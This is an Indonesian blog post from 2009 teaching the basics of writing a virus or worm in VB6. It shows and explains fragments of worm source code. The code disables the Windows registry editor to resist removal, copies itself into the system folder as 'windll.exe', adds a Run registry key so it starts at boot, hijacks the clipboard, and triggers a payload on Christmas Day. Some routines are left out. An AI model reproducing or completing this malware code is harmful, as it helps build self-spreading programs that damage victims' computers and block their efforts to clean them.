|
Main » 2009 » August » 17 » Dasar Perakitan Virus/Worm dengan VB6
6:16 AM Dasar Perakitan Virus/Worm dengan VB6 |
Pada dasarnya sebuah Virus/Worm memiliki ciri khas berikut :
1.Mampu menggandakan diri
2.Mampu melindungi diri [stealth]
3.Mampu memanipulasi sistem
4.Mampu unjuk gigi [pamer]
5.Mampu melakukan rekayasa sosial.
Kita
lanjut dengan contoh potongan coding virus/worm menggunakan VB6. Coding
sengaja dipotong untuk menghindari anak kecil yang lagi belajar copy
paste dan ga sengaja bikin virus di VB ——————————————————————
Private Sub Form_Load() On Error Resume Next If App.PrevInstance = True Then End Call RegDisable Call InfeksiSistem If App.Path = “A:\” Or “B:\” Then Unload Me End If End Sub
——————————————————————
Potongan kode ini melakukan beberapa hal yaitu :
On Error Resume Next :
Apabila terjadi error, maka program akan melanjutkan rutin kode selanjutnya.
If App.PrevInstance = True Then End :
Apabila virus telah aktif, maka akhiri program.
Call RegDisable Call InfeksiSistem
Memanggil rutin prosedur RegDisable dan Infeksi sistem .
If App.Path = “A:\” Or “B:\” Then Unload Me
Apabila virus aktif pada drive A:\ atau B:\ maka akhiri program.
——————————————————————
Private Sub WormTimer_Timer() On Error Resume Next Clipboard.Clear Clipboard.SetText “Ohh rembulan….. !!!” End Sub
——————————————————————
Kode
diatas merupakan prosedur timer, yang akan dieksekusi setiap panjang
detik tertentu.Saat dieksekusi, virus akan melakukan perintah :
Clipboard.Clear Clipboard.SetText “Ohh rembulan….. !!!”
yaitu
menghapus clipboard pada komputer anda, dan setiap kali anda melakukan
fungsi “paste” pada program , maka akan tercetak tulisan “Ohh
rembulan…. !!!”
——————————————————————
Private Sub WormTimer2_Timer() On Error Resume Next Call InfeksiDisket If Day(Now) = 25 And Month(Now) = 12 Then Call Payload Unload Me End If End Sub
——————————————————————
Kode
ini juga merupakan prosedur timer yang akan dieksekusi setiap detik
tertentu, saat dieksekusi virus akan melakukan perintah :
Call InfeksiDisket If Day(Now) = 25 And Month(Now) = 12 Then Call Payload Unload Me
Yaitu
memanggil prosedur InfeksiDisket, kemudian jika hari ini adalah Natal,
yaitu tanggal 25 Desember, maka virus memanggil prosedur Payload. Jika
Bukan hari natal, maka virus tidak memanggil prosedur ini.
——————————————————————
Function RegString(HiveAndKey As String, _ Value As String) Dim wormreg As Variant Set wormreg = CreateObject(”wscript.Shell”) wormreg.Regwrite HiveAndKey, Value End Function
Function RegDWord(HiveAndKey As String, _ Value As Integer) Dim wormreg As Variant Set wormreg = CreateObject(”wscript.shell”) wormreg.Regwrite HiveAndKey, Value, “REG_DWORD” End Function
——————————————————————
Pada baris kode ini, virus mendeklarasikan fungsi RegString dan RegDWord untuk melakukan manipulasi pada registry windows.
——————————————————————
Private Sub RegDisable() On Error Resume Next RegDWord “HKCU\Software\Microsoft\Windows\Current” & _ “Version\Policies\System\DisableRegistryTools”, 1 End Sub
——————————————————————
Pada
prosedur RegDisable ini , Virus akan menonaktifkan fungsi Regedit pada
Windows, sehingga dapat melindungi dirinya dari penghapusan.
——————————————————————
Private Sub InfeksiSistem() On Error Resume Next Dim infeksiworm As Variant Dim sysfolder As Object Set infeksiworm = CreateObject(”scripting.filesystemobject”) Set sysfolder = infeksiworm.GetSpecialFolder(1) FileCopy WormFile, sysfolder & “\” & “windll.exe” RegString “HKLM\Software\Microsoft\Windows\Curr” & _ “entVersion\Run\windll”, sysfolder & “\” & “windll.exe” End Sub
——————————————————————
Pada prosedur InfeksiSistem, virus akan mencari direktori System Windows dengan baris kode dibawah ini :
Dim infeksiworm As Variant Dim sysfolder As Object Set infeksiworm = CreateObject(”scripting.filesystemobject”) Set sysfolder = infeksiworm.GetSpecialFolder(1)
Kemudian Virus akan menggandakan dirinya dengan baris kode berikut :
FileCopy WormFile, sysfolder & “\” & “windll.exe”
Selain itu virus juga akan memanipulasi registry agar dijalankan setiap kali booting masuk ke windows :
RegString “HKLM\Software\Microsoft\Windows\Curr” & _ “entVersion\Run\windll”, sysfolder & “\” & “windll.exe” Selain itu virus juga akan memanipulasi registry agar dijalankan setiap kali booting masuk ke windows :
RegString “HKLM\Software\Microsoft\Windows\Curr” & _ “entVersion\Run\windll”, sysfolder & “\” & “windll.exe”
Oke deh, sekian perkenalan kita dengan dasar perakitan Virus/Worm VB6
Silahkan belajar lebih lanjut mengenai Virus/Worm melalui internet dan
juga buku-buku hacking yang belakangan ini marak terbit ditoko buku. |
Category: Malware |
Views: 459 |
Added by: SikuruZ
| Rating: 0.0/0 |
|
|